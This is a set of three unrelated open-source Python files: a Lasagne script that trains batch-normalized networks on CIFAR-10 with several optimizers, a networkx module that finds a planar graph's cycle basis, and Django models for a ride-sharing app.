LEARNING_RATE = 0.01
MOMENTUM = 0.9
FREQUENCY = 0.1
MODEL = 'mlpbn'
GRADIENT = 'sgd_adagrad'
BNALG = 'original'
bnalg_const_dict = {
"const1": 1.0,
"const075": 0.75,
"const05": 0.5,
"const025": 0.25,
"const01": 0.1,
"const001": 0.01,
"const0001": 0.001,
"const0": 0.0, }
# ################## Load and prepare the CIFAR-10 dataset ###################
# load_dataset() below reads the pickled CIFAR-10 batches from a local path
# (CIFAR_PATH) into numpy arrays. It doesn't involve Lasagne at all.
def custom_svrg2(loss, params, m, learning_rate=0.01, objective=None, data=None, target=None, getpred=None):
theano.pp(loss)
grads = theano.grad(loss, params)
n = data.shape[0]
updates = OrderedDict()
rng = T.shared_randomstreams.RandomStreams(seed=149)
for param, grad in zip(params, grads):
value = param.get_value(borrow=True)
mu = grad / n
def oneStep(w):
t = rng.choice(size=(1,), a=n)
loss_part_tilde = objective(getpred(data[t], param), target[t])
loss_part_tilde = loss_part_tilde.mean()
g_tilde = theano.grad(loss_part_tilde, param)
loss_part = objective(getpred(data[t], w), target[t])
loss_part = loss_part.mean()
g = theano.grad(loss_part, w)
w = w - learning_rate * (g - g_tilde + mu)
return w
w_tilde, scan_updates = theano.scan(fn=oneStep, outputs_info=param, n_steps=m)
updates.update(scan_updates)
updates[param] = w_tilde[-1]
return updates
def mysgd(loss_or_grads, params, learning_rate):
grads = lasagne.updates.get_or_compute_grads(loss_or_grads, params)
updates = OrderedDict()
for param, grad in zip(params, grads):
updates[param] = param - learning_rate * grad
return updates
def mysgd_adagrad(loss_or_grads, params, learning_rate=0.01, eps=1.0e-8):
if not isinstance(loss_or_grads, list):
grads = theano.grad(loss_or_grads, params)
else:
grads = loss_or_grads
updates = OrderedDict()
for param, grad in zip(params, grads):
value = param.get_value(borrow=True)
acc = theano.shared(np.zeros(value.shape, dtype=value.dtype), broadcastable=param.broadcastable)
acc_new = acc + grad ** 2
updates[acc] = acc_new
updates[param] = param - learning_rate * grad / T.sqrt(acc_new + eps)
return updates
def mysvrg(loss_or_grads, params, learning_rate,avg_gradient):
    # Not working right now: grad_it and the per-parameter avg_gradient bookkeeping are undefined.
grads = lasagne.updates.get_or_compute_grads(loss_or_grads, params)
updates = OrderedDict()
for param, grad in zip(params, grads):
updates[param] = param - learning_rate * (grad- grad_it + avg_gradient[param])
return updates
def load_dataset():
# We first define a download function, supporting both Python 2 and 3.
if sys.version_info[0] == 2:
from urllib import urlretrieve
else:
from urllib.request import urlretrieve
CIFAR_PATH = "../../data/cifar-10-batches-py/"
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = pickle.load(f)
X = datadict['data']
Y = datadict['labels']
# print X.shape
#X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype("float")
X = X.reshape(10000, 3, 32, 32).transpose(0,1,2,3).astype("float32")
Y = np.array(Y).astype("int32")
return X, Y
# We can now download and read the training and test set images and labels.
# X_train = load_mnist_images('train-images-idx3-ubyte.gz')
# y_train = load_mnist_labels('train-labels-idx1-ubyte.gz')
# X_test = load_mnist_images('t10k-images-idx3-ubyte.gz')
# y_test = load_mnist_labels('t10k-labels-idx1-ubyte.gz')
# Read NI dataset
# DATA_PATH = "/Users/myt007/git/svrg/ni/"
X_train1,y_train1 = load_CIFAR_batch(CIFAR_PATH + "data_batch_1")
X_train2,y_train2 = load_CIFAR_batch(CIFAR_PATH + "data_batch_2")
X_train3,y_train3 = load_CIFAR_batch(CIFAR_PATH + "data_batch_3")
X_train4,y_train4 = load_CIFAR_batch(CIFAR_PATH + "data_batch_4")
X_train5,y_train5 = load_CIFAR_batch(CIFAR_PATH + "data_batch_5")
X_test,y_test = load_CIFAR_batch(CIFAR_PATH + "test_batch")
X_train = np.concatenate((X_train1,X_train2,X_train3,X_train4,X_train5))
y_train = np.concatenate((y_train1,y_train2,y_train3,y_train4,y_train5))
# We reserve the last 10000 training examples for validation.
X_train, X_val = X_train[:-10000], X_train[-10000:]
y_train, y_val = y_train[:-10000], y_train[-10000:]
X_train = X_train.astype("float32")
X_val = X_val.astype("float32")
X_test = X_test.astype("float32")
y_train = y_train.astype("int32")
y_val = y_val.astype("int32")
y_test = y_test.astype("int32")
# We just return all the arrays in order, as expected in main().
# (It doesn't matter how we do this as long as we can read them again.)
# print("X_train1")
# print(X_train1.shape)
# print(X_train1.dtype)
# print("\n")
# print("y_train1")
# print(y_train1.shape)
# print("X_train")
# print(X_train.shape)
# print(X_train.dtype)
# print("\n")
# print("y_train")
# print(y_train.shape)
# # print("X_val")
# # print(X_val.shape)
# # print("y_val")
# # print(y_val.shape)
# print("X_test")
# print(X_test.shape)
# print("y_test")
# print(y_test.shape)
return X_train, y_train, X_val, y_val, X_test, y_test
# ##################### Build the neural network model #######################
# This script supports three types of models. For each one, we define a
# function that takes a Theano variable representing the input and returns
# the output layer of a neural network model built in Lasagne.
def build_mlp(input_var=None, num_hidden_units=NUM_HIDDEN_UNITS):
l_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32),
input_var=input_var)
l_hid = lasagne.layers.DenseLayer(
l_in, num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.GlorotUniform())
l_hid = lasagne.layers.DenseLayer(
l_hid, num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.GlorotUniform())
l_out = lasagne.layers.DenseLayer(
l_hid, num_units=10,
nonlinearity=lasagne.nonlinearities.softmax)
return l_out
def build_mlpbn(input_var=None, num_hidden_units=NUM_HIDDEN_UNITS,bnalg = BNALG):
l_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32),
input_var=input_var)
if bnalg == 'original':
l_hidden = lasagne.layers.batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
l_hidden = lasagne.layers.batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
elif bnalg == 'dbn':
l_hidden = my_bn_layer.my_batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
l_hidden = my_bn_layer.my_batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
elif bnalg == 'dbn2':
l_hidden = my_bn_layer2.my_batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
l_hidden = my_bn_layer2.my_batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
)
)
elif 'const' in bnalg:
# print(bnalg)
# print(bnalg_const_dict)
        if bnalg not in bnalg_const_dict:
            raise ValueError("Incorrect bnalg method %r: not in predefined dictionary." % bnalg)
        the_alpha = bnalg_const_dict[bnalg]
l_hidden = my_bn_layer_const.my_batch_norm (
lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
), alpha = the_alpha
)
l_hidden = my_bn_layer_const.my_batch_norm (
lasagne.layers.DenseLayer(
l_hidden,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
), alpha = the_alpha
)
    l_out = lasagne.layers.DenseLayer(
        l_hidden,
        num_units=10,  # 10 output classes (CIFAR-10), matching build_mlp
        nonlinearity=lasagne.nonlinearities.softmax,
    )
return l_out
# ############################# Batch iterator ###############################
# This is just a simple helper function iterating over training data in
# mini-batches of a particular size, optionally in random order. It assumes
# data is available as numpy arrays. For big datasets, you could load numpy
# arrays as memory-mapped files (np.load(..., mmap_mode='r')), or write your
# own custom data iteration function. For small datasets, you can also copy
# them to GPU at once for slightly improved performance. This would involve
# several changes in the main program, though, and is not demonstrated here.
def iterate_minibatches(inputs, targets, batchsize, shuffle=False ):
assert len(inputs) == len(targets)
if shuffle:
indices = np.arange(len(inputs))
np.random.shuffle(indices)
for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):
if shuffle:
excerpt = indices[start_idx:start_idx + batchsize]
else:
excerpt = slice(start_idx, start_idx + batchsize)
yield inputs[excerpt], targets[excerpt]
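# Minimal usage sketch with dummy numpy arrays (doctest-style comments; note that
# a final partial batch smaller than batchsize is silently dropped):
#   >>> X = np.arange(10).reshape(5, 2).astype('float32')
#   >>> y = np.arange(5).astype('int32')
#   >>> [t.tolist() for _, t in iterate_minibatches(X, y, 2)]
#   [[0, 1], [2, 3]]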
# ############################## Main program ################################
# Everything else will be handled in our main program now. We could pull out
# more functions to better separate the code, but it wouldn't make it any
# easier to read.
def main(model=MODEL,gradient = GRADIENT, num_epochs=NUM_EPOCHS, num_hidden_units = NUM_HIDDEN_UNITS, bnalg = BNALG):
rng = np.random.RandomState(42)
lasagne.random.set_rng(rng)
# Load the dataset
NUM_EPOCHS = num_epochs
print("Loading data...")
X_train, y_train, X_val, y_val, X_test, y_test = load_dataset()
# Prepare Theano variables for inputs and targets
input_var = T.tensor4('inputs')
target_var = T.ivector('targets')
# Create neural network model (depending on first command line parameter)
print("Building model and compiling functions...")
if model == 'mlp':
network = build_mlp(input_var, num_hidden_units)
elif model == 'mlpbn':
network = build_mlpbn(input_var, num_hidden_units,bnalg)
else:
print("Unrecognized model type %r." % model)
return
prediction = lasagne.layers.get_output(network, deterministic= False, batch_norm_update_averages = True)
loss = T.mean(lasagne.objectives.categorical_crossentropy(prediction, target_var))
acc = T.mean(T.eq(T.argmax(prediction, axis=1), target_var),dtype=theano.config.floatX)
params = lasagne.layers.get_all_params(network, trainable=True)
if gradient == 'sgd':
updates = mysgd(loss, params, LEARNING_RATE)
elif gradient == 'sgd_adagrad':
updates = mysgd_adagrad(loss, params, LEARNING_RATE)
elif gradient == 'svrg':
updates = custom_svrg2(loss,params, m=100, learning_rate = LEARNING_RATE, objective=lasagne.objectives.categorical_crossentropy , data=input_var, target = target_var, getpred= getpred)
test_prediction = lasagne.layers.get_output(network, deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(test_prediction,target_var)
test_loss = test_loss.mean()
test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1), target_var),dtype=theano.config.floatX)
# Compile a function performing a training step on a mini-batch (by giving
# the updates dictionary) and returning the corresponding training loss:
train_fn = theano.function([input_var, target_var], loss, updates=updates)
train_acc = theano.function([input_var, target_var], acc)
# Compile a second function computing the validation loss and accuracy:
val_fn = theano.function([input_var, target_var], [test_loss, test_acc])
# Finally, launch the training loop.
print("Starting training...")
# We iterate over epochs:
loss_train = []
loss_val = []
acc_val = []
acc_train = []
acc_test = []
loss_test = []
times = []
start_time = time.time()
for epoch in range(NUM_EPOCHS):
# In each epoch, we do a full pass over the training data:
train_err = 0
tmp_acc = 0
train_batches = 0
for batch in iterate_minibatches(X_train, y_train, BATCH_SIZE, shuffle=True):
inputs, targets = batch
train_err += train_fn(inputs, targets)
tmp_acc += train_acc(inputs, targets)
train_batches += 1
# And a full pass over the validation data:
val_err = 0
val_acc = 0
val_batches = 0
for batch in iterate_minibatches(X_val, y_val, BATCH_SIZE, shuffle=False):
inputs, targets = batch
err, acc = val_fn(inputs, targets)
val_err += err
val_acc += acc
val_batches += 1
# and a full pass over the test data, bingo!
test_err = 0
test_acc = 0
test_batches = 0
for batch in iterate_minibatches(X_test, y_test, BATCH_SIZE, shuffle=False):
inputs, targets = batch
err, acc = val_fn(inputs, targets)
test_err += err
test_acc += acc
test_batches += 1
# Then we print the results for this epoch:
        epoch_time = time.time() - start_time
        start_time = time.time()
        times.append(epoch_time)
        print("Epoch {} of {} took {:.3f}s".format(epoch + 1, num_epochs, epoch_time))
loss_train.append(train_err / train_batches)
acc_train.append(tmp_acc / train_batches)
print(" training loss:\t\t{:.6f}".format(train_err / train_batches))
loss_val.append(val_err / val_batches)
print(" validation loss:\t\t{:.6f}".format(val_err / val_batches))
acc_val.append(val_acc / val_batches)
print(" validation accuracy:\t\t{:.2f} %".format(
val_acc / val_batches * 100))
acc_test.append(test_acc / test_batches)
loss_test.append(test_err / test_batches)
print(" test accuracy:\t\t{:.2f} %".format(test_acc / test_batches * 100))
# print(" test loss:\t\t{:.2f}".format(test_err / val_batches))
# After training, we compute and print the test error:
test_err = 0
test_acc = 0
test_batches = 0
for batch in iterate_minibatches(X_test, y_test, BATCH_SIZE, shuffle=False):
inputs, targets = batch
err, acc = val_fn(inputs, targets)
test_err += err
test_acc += acc
test_batches += 1
print("Final results:")
print(" test loss:\t\t\t{:.6f}".format(test_err / test_batches))
print(" test accuracy:\t\t{:.2f} %".format(test_acc / test_batches * 100))
print(" average time per epoch :\t\t{:.3f} s".format(np.mean(times)))
print("result/"+model+"_"+gradient+"_"+bnalg+".txt")
file_handle=open("result/"+model+"_"+gradient+"_"+bnalg+".txt", 'w+')
file_handle.write("Final results:\n")
file_handle.write(" test loss:\t\t\t{:.6f}\n".format(test_err / test_batches))
file_handle.write(" test accuracy:\t\t{:.2f} %".format(test_acc / test_batches * 100))
count = (np.arange(NUM_EPOCHS)+1) #*X_train.shape[0]
#PLOT
matplotlib.rcParams.update({'font.size': 16})
plt.figure(1)
plt.plot(count, loss_train, 'bs-',label="Training Set")
plt.title(model+'-'+gradient+'-Loss of Training/Validation Set')
plt.plot(count, loss_val, 'ro--',label="Validation Set")
plt.xlabel('# Epochs')
plt.ylabel('Loss')
plt.legend()
# plt.show()
pylab.savefig(OUTPUT_FIGURE_PATH+'fig_LossTrain-'+model+'-'+gradient+'-'+str(NUM_EPOCHS)+'.png',
bbox_inches='tight')
plt.figure(2)
plt.plot(count, acc_train, 'bs-',label="Training Set")
plt.title(model+'-'+gradient+'-Predict Accuracy of Training/Validation Set')
plt.plot(count, acc_val, 'ro--',label="Validation Set")
plt.plot(count, acc_test, 'g^:',label="Test Set")
plt.xlabel('# Epochs')
plt.ylabel('Predict Accuracy')
plt.legend(bbox_to_anchor=(1,0.25))
# plt.show()
pylab.savefig(OUTPUT_FIGURE_PATH+'fig_Pred-'+model+'-'+gradient+'-'+str(NUM_EPOCHS)+'.png',
bbox_inches='tight')
print ("Finish plotting...")
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"loss_train.txt",loss_train)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"loss_val.txt",loss_val)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"acc_train.txt",acc_train)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"acc_val.txt",acc_val)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"acc_test.txt",acc_test)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"loss_test.txt",loss_test)
np.savetxt(OUTPUT_DATA_PATH+model+"_"+gradient+"_"+str(NUM_EPOCHS)+"_"+bnalg+"_"+"epoch_times.txt",times)
print ("Data saved...")
# Optionally, you could now dump the network weights to a file like this:
# np.savez('model.npz', *lasagne.layers.get_all_param_values(network))
#
# And load them again later on like this:
# with np.load('model.npz') as f:
# param_values = [f['arr_%d' % i] for i in range(len(f.files))]
# lasagne.layers.set_all_param_values(network, param_values)
if __name__ == '__main__':
if ('--help' in sys.argv) or ('-h' in sys.argv) or ('help' in sys.argv):
print("Trains a neural network on MNIST using Lasagne.")
print("Usage: %s [MODEL] [GRADIENT] [NUM_EPOCHS]" % sys.argv[0])
print()
print("MODEL: 'mlp' for a simple Multi-Layer Perceptron (MLP),")
print(" 'mlpbn: for an MLP with batch Normalization")
print("GRADIENT: 'sgd', 'svrg'")
print("NUM_EPOCHS: ")
print("NUM_HIDDEN_UNITS: ")
print("BNALG: ")
else:
kwargs = {}
if len(sys.argv) > 1:
kwargs['model'] = sys.argv[1]
if len(sys.argv) > 2:
kwargs['gradient'] = sys.argv[2]
if len(sys.argv) > 3:
kwargs['num_epochs'] = int(sys.argv[3])
if len(sys.argv) > 4:
kwargs['num_hidden_units'] = int(sys.argv[4])
if len(sys.argv) > 5:
kwargs['bnalg'] = sys.argv[5]
main(**kwargs)
| myt00seven/svrg | cifar/large_gpu_cifar10_ffn.py | Python | mit | 20,715 |
#!/usr/bin/env python
"""
cycle_basis.py
functions for calculating the cycle basis of a graph
"""
from numpy import *
import networkx as nx
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.path import Path
if matplotlib.__version__ >= '1.3.0':
from matplotlib.path import Path
else:
from matplotlib import nxutils
from itertools import chain
from itertools import ifilterfalse
from itertools import izip
from itertools import tee
from collections import defaultdict
import time
from helpers import *
class Cycle():
""" Represents a set of nodes that make up a cycle in some
    graph. It is hashable and does not care about orientation: two
    cycles are equal if they share the same nodes.
A cycle can be compared to a set or frozenset of nodes.
path is a list of vertices describing a closed path in the cycle.
if it is absent, a closed path will be calculated together with
coordinates.
coords is an array of x-y pairs representing the coordinates of
the cycle path elements.
"""
def __init__(self, graph, edges, coords=None):
""" Initializes the Cycle with an edge list representing the
cycle.
All edges should be ordered such that a cycle is represented
as
(1,2)(2,3)(3,4)...(n-2,n-1)(n-1,1)
Parameters:
graph: The underlying graph object
edges: The edge list making up the cycle.
            coords: Optional precomputed x-y coordinates of the cycle
                path; computed from the graph node attributes if omitted.
In case the unordered edge set is not a connected graph,
e.g. when removing one cycle splits the surrounding
one in half, the smaller connected component in terms
of total length is thrown away. Since our cycles are
typically convex, this means we use the outermost
component.
"""
self.graph = graph
edges, self.total_area = self.ordered_edges(edges)
self.path = zip(*edges)[0]
if coords is None:
self.coords = array([[graph.node[n]['x'], graph.node[n]['y']]
for n in self.path])
else:
self.coords = coords
self.edges = edges
# This allows comparisons
self.edgeset = set([tuple(sorted(e)) for e in edges])
self.com = mean(self.coords, axis=0)
# This frozenset is used to compare/hash cycles.
self._nodeset = frozenset(self.path)
def ordered_edges(self, edges):
""" Uses the graph associated to this cycle to order
the unordered edge set.
Also return the area of the cycle. This is defined as
max(Areas of individual connected components) -
(Areas of other connected components)
This assumes that the cycle is one large cycle containing
one or more smaller cycles.
"""
# construct subgraph consisting of only the specified edges
edge_graph = nx.Graph(edges)
con = sorted_connected_components(edge_graph)
# Calculate sorted edge list for each connected component
# of the cycle
component_sorted_edges = []
areas = []
G = self.graph
for comp in con:
# get ordered list of edges
component_edges = comp.edges()
n_edges = len(component_edges)
sorted_edges = []
start = component_edges[0][0]
cur = start
prev = None
for i in xrange(n_edges):
nextn = [n for n in comp.neighbors(cur)
if n != prev][0]
sorted_edges.append((cur, nextn))
prev = cur
cur = nextn
# coordinates of path
coords = array([(G.node[u]['x'], G.node[u]['y'])
for u, v in sorted_edges] \
+ [(G.node[sorted_edges[0][0]]['x'],
G.node[sorted_edges[0][0]]['y'])])
areas.append(polygon_area(coords))
component_sorted_edges.append(sorted_edges)
if len(areas) > 1:
areas = sorted(areas, reverse=True)
total_area = areas[0] - sum(areas[1:])
else:
total_area = areas[0]
return list(chain.from_iterable(
sorted(component_sorted_edges, key=len, reverse=True))), \
total_area
def intersection(self, other):
""" Returns an edge set representing the intersection of
the two cycles.
"""
inters = self.edgeset.intersection(other.edgeset)
return inters
def union(self, other, data=True):
""" Returns the edge set corresponding to the union of two cycles.
Will overwrite edge/vertex attributes from other to this,
so only use if both cycle graphs are the same graph!
"""
union = self.edgeset.union(other.edgeset)
return union
def symmetric_difference(self, other, intersection=None):
""" Returns a Cycle corresponding to the symmetric difference of
the Cycle and other. This is defined as the set of edges which
is present in either cycle but not in both.
If the intersection has been pre-calculated it can be used.
This will fail on non-adjacent loops.
"""
new_edgeset = list(self.edgeset.symmetric_difference(
other.edgeset))
return Cycle(self.graph, new_edgeset)
def area(self):
""" Returns the area enclosed by the polygon defined by the
Cycle. If the cycle contains more than one connected component,
this is defined as the area of the largest area connected
component minus the areas of the other connected components.
"""
return self.total_area
def radii(self):
""" Return the radii of all edges in this cycle.
"""
return array([self.graph[u][v]['conductivity']
for u, v in self.edgeset])
def __hash__(self):
""" Implements hashing by using the internal set description's hash
"""
return self._nodeset.__hash__()
def __eq__(self, other):
""" Implements comparison using the internal set description
"""
if isinstance(other, Cycle):
return self._nodeset.__eq__(other._nodeset)
elif isinstance(other, frozenset) or isinstance(other, set):
return self._nodeset.__eq__(other)
else:
return -1
def __repr__(self):
return repr(self._nodeset)
def polygon_area(coords):
""" Return the area of a closed polygon
"""
Xs = coords[:,0]
Ys = coords[:,1]
# Ignore orientation
return 0.5*abs(sum(Xs[:-1]*Ys[1:] - Xs[1:]*Ys[:-1]))
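# Example (shoelace formula on a closed unit square, first vertex repeated at the
# end, as produced by the cycle paths in this module):
#   >>> polygon_area(array([[0., 0.], [1., 0.], [1., 1.], [0., 1.], [0., 0.]]))
#   1.0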
def traverse_graph(G, start, nextn):
""" Traverses the pruned (i.e. ONLY LOOPS) graph G counter-clockwise
in the direction of nextn until start is hit again.
If G has treelike components this will fail and get stuck, there
is no backtracking.
Returns a list of nodes visited, a list of edges visited and
an array of node coordinates.
This will find (a) all internal
smallest loops (faces of the planar graph) and (b) one maximal
outer loop
"""
start_coords = array([G.node[start]['x'], G.node[start]['y']])
nodes_visited = [start]
nodes_visited_set = set()
edges_visited = []
coords = [start_coords]
prev = start
cur = nextn
while cur != start:
cur_coords = array([G.node[cur]['x'], G.node[cur]['y']])
        # We ignore all neighbors we already visited to avoid multiple loops
neighs = [n for n in G.neighbors(cur) if n != prev and n != cur]
edges_visited.append((prev, cur))
nodes_visited.append(cur)
coords.append(cur_coords)
n_neighs = len(neighs)
if n_neighs > 1:
# Choose path that keeps the loop closest on the left hand side
prev_coords = array([G.node[prev]['x'], G.node[prev]['y']])
neigh_coords = array([[G.node[n]['x'], G.node[n]['y']] \
for n in neighs])
## Construct vectors and normalize
u = cur_coords - prev_coords
vs = neigh_coords - cur_coords
# calculate cos and sin between direction vector and neighbors
u /= sqrt((u*u).sum(-1))
vs /= sqrt((vs*vs).sum(-1))[...,newaxis]
coss = dot(u, vs.T)
sins = cross(u, vs)
# this is a function between -2 and +2, where the
# leftmost path corresponds to -2, rightmost to +2
# sgn(alpha)(cos(alpha) - 1)
ranked = sign(sins)*(coss - 1.)
prev = cur
cur = neighs[argmin(ranked)]
else:
# No choice to make
prev = cur
cur = neighs[0]
# Remove pathological protruding loops
if prev in nodes_visited_set:
n_ind = nodes_visited.index(prev)
del nodes_visited[n_ind+1:]
del coords[n_ind+1:]
del edges_visited[n_ind:]
nodes_visited_set.add(prev)
edges_visited.append((nodes_visited[-1], nodes_visited[0]))
return nodes_visited, edges_visited, array(coords)
def cycle_mtp_path(cycle):
""" Returns a matplotlib Path object describing the cycle.
"""
# Set up polygon
verts = zeros((cycle.coords.shape[0] + 1, cycle.coords.shape[1]))
verts[:-1,:] = cycle.coords
verts[-1,:] = cycle.coords[0,:]
codes = Path.LINETO*ones(verts.shape[0])
codes[0] = Path.MOVETO
codes[-1] = Path.CLOSEPOLY
return Path(verts, codes)
def outer_loop(G, cycles):
""" Detects the boundary loop in the set of fundamental cycles
by noting that the boundary is precisely the one loop with
maximum area (since it contains all other loops, they all must
have smaller area)
"""
return max([(c.area(), c) for c in cycles])[1]
def shortest_cycles(G):
""" Returns a list of lists of Cycle objects belonging to the
fundamental cycles of the pruned (i.e. there are no treelike
components) graph G by traversing the graph counter-clockwise
for each node until the starting node has been found.
Also returns the outer loop.
"""
cycleset = set()
# Betti number counts interior loops, this algorithm finds
# exterior loop as well!
n_cycles = G.number_of_edges() - G.number_of_nodes() + 1
# Count outer loop as well
if n_cycles >= 2:
n_cycles += 1
print "Number of cycles including boundary: {}.".format(n_cycles)
t0 = time.time()
mst = nx.minimum_spanning_tree(G, weight=None)
for u, v in G.edges_iter():
if not mst.has_edge(u, v):
# traverse cycle in both directions
path, edges, coords = traverse_graph(G, u, v)
cycleset.add(Cycle(G, edges, coords=coords))
path, edges, coords = traverse_graph(G, v, u)
cycleset.add(Cycle(G, edges, coords=coords))
if len(cycleset) != n_cycles:
print "WARNING: Found only", len(cycleset), "cycles!!"
t1 = time.time()
print "Detected fundamental cycles in {}s".format(t1 - t0)
#print "Number of detected facets:", len(cycleset)
return list(cycleset)
def find_neighbor_cycles(G, cycles):
""" Returns a set of tuples of cycle indices describing
which cycles share edges
"""
n_c = len(cycles)
# Construct edge dictionary
edges = defaultdict(list)
for i in xrange(n_c):
for e in cycles[i].edges:
edges[tuple(sorted(e))].append(i)
# Find all neighboring cycles
neighbor_cycles = set()
for n in edges.values():
neighbor_cycles.add(tuple(sorted(n)))
return neighbor_cycles
| hronellenfitsch/nesting | cycle_basis.py | Python | mit | 11,955 |
from __future__ import unicode_literals
import re
from django.contrib.auth.models import (AbstractBaseUser, PermissionsMixin,
UserManager)
from django.core import validators
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
from notifications.models import *
from django.db import models
from django.utils import timezone
from broadcast.models import Broadcast
class CustomUser(AbstractBaseUser, PermissionsMixin):
"""
A custom user class that basically mirrors Django's `AbstractUser` class
    and doesn't force `first_name` or `last_name`, with sensibilities for
international names.
http://www.w3.org/International/questions/qa-personal-names
"""
username = models.CharField(_('username'), max_length=30, unique=True,
help_text=_('Required. 30 characters or fewer. Letters, numbers and '
'@/./+/-/_ characters'),
validators=[
validators.RegexValidator(re.compile(
'^[\w.@+-]+$'), _('Enter a valid username.'), 'invalid')
])
full_name = models.CharField(_('full name'), max_length=254, blank=False)
short_name = models.CharField(_('short name'), max_length=30, blank=True)
choices = (('Male', 'Male'), ('Female', 'Female'))
sex = models.CharField(_('sex'), max_length=30, blank=False, choices=choices)
email = models.EmailField(_('email address'), max_length=254, unique=True)
phone_number = models.CharField(_('phone number'), max_length=20, validators=[
validators.RegexValidator(re.compile(
'^[0-9]+$'), _('Only numbers are allowed.'), 'invalid')
])
user_choices = (('Driver', 'Driver'), ('Passenger', 'Passenger'))
user_type = models.CharField(_('user type'), max_length=30, blank=False, choices=user_choices)
address = models.TextField(_('location'), max_length=400, blank=False)
is_staff = models.BooleanField(_('staff status'), default=False,
help_text=_('Designates whether the user can log into this admin '
'site.'))
is_verified = models.BooleanField(_('user verified'), default=False,
        help_text=_('Designates whether the user is a verified user'))
is_active = models.BooleanField(_('active'), default=True,
help_text=_('Designates whether this user should be treated as '
'active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
objects = UserManager()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
def __unicode__(self):
return self.username
def get_absolute_url(self):
return "/profile/%s" % self.username
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = self.full_name
return full_name.strip()
def get_short_name(self):
"Returns the short name for the user."
return self.short_name.strip()
def get_sex(self):
return self.sex
def email_user(self, subject, message, from_email=None):
"""
Sends an email to this User.
"""
send_mail(subject, message, from_email, [self.email])
def get_no_messages(self):
number = Message.objects.filter(recipient=self, read=False)
if number.count() > 0:
return number.count()
else:
return None
def get_messages(self):
msg = Message.objects.filter(recipient=self, read=False).order_by('date').reverse()
return msg
def get_messages_all(self):
msg = Message.objects.filter(recipient=self).order_by('date').reverse()
return msg
def get_notifications(self):
return self.notifications.unread()
def get_no_notifs(self):
return self.notifications.unread().count()
def is_follows(self, user_1):
foll = Follow.objects.filter(follower=self, followee=user_1)
if foll.exists():
return True
else:
return False
def get_no_followers(self):
num = Follow.objects.filter(followee=self).count()
return num
def get_no_following(self):
num = Follow.objects.filter(follower=self).count()
return num
def get_following(self):
num = Follow.objects.filter(follower=self).values_list('followee')
result = []
for follower in num:
user = CustomUser.objects.get(pk=follower[0])
result.append(user)
return result
def get_profile(self):
profile = Profile.objects.get(user=self)
return profile
def no_of_rides_shared(self):
return self.vehiclesharing_set.filter(user=self, ended=True).count()
def no_of_request_completed(self):
return self.request_set.filter(status='approved', user=self).count()
def get_no_broadcast(self):
return Broadcast.objects.filter(user=self).count()
def get_broadcast(self):
all_broad = Broadcast.objects.filter(user=self)[0:10]
return all_broad
class Vehicle(models.Model):
year = models.IntegerField(_('year of purchase'), blank=False)
make = models.CharField(_('vehicle make'), max_length=254, blank=False)
plate = models.CharField(_('liscenced plate number'), max_length=10, blank=False)
model = models.CharField(_('vehicle model'), max_length=254, blank=False)
seats = models.IntegerField(_('no of seats'), blank=False)
user_choices = (('private', 'private'), ('hired', 'hired'))
type = models.CharField(_('vehicle type'), max_length=30, blank=False, choices=user_choices)
user_choices = (('Car', 'Car'), ('Bus', 'Bus'), ('Coaster', 'Coaster'), ('Truck', 'Truck'))
category = models.CharField(_('vehicle category'), max_length=30, blank=False, choices=user_choices)
user = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
def get_absolute_url(self):
return "/app/ride/%d/view" % self.pk
def __str__(self):
return self.make + " " + self.model + " belonging to " + self.user.username
class VehicleSharing(models.Model):
start = models.CharField(_('starting point'), max_length=256, blank=False, )
dest = models.CharField(_('destination'), max_length=256, blank=False)
cost = models.IntegerField(_('cost'), blank=False)
date = models.DateField(_('date'), default=timezone.now)
start_time = models.TimeField(_('start time'), max_length=256, blank=False)
    arrival_time = models.TimeField(_('estimated arrival'), max_length=256, blank=False)
no_pass = models.IntegerField(_('no of passengers'), blank=False)
details = models.TextField(_('ride details'), blank=False)
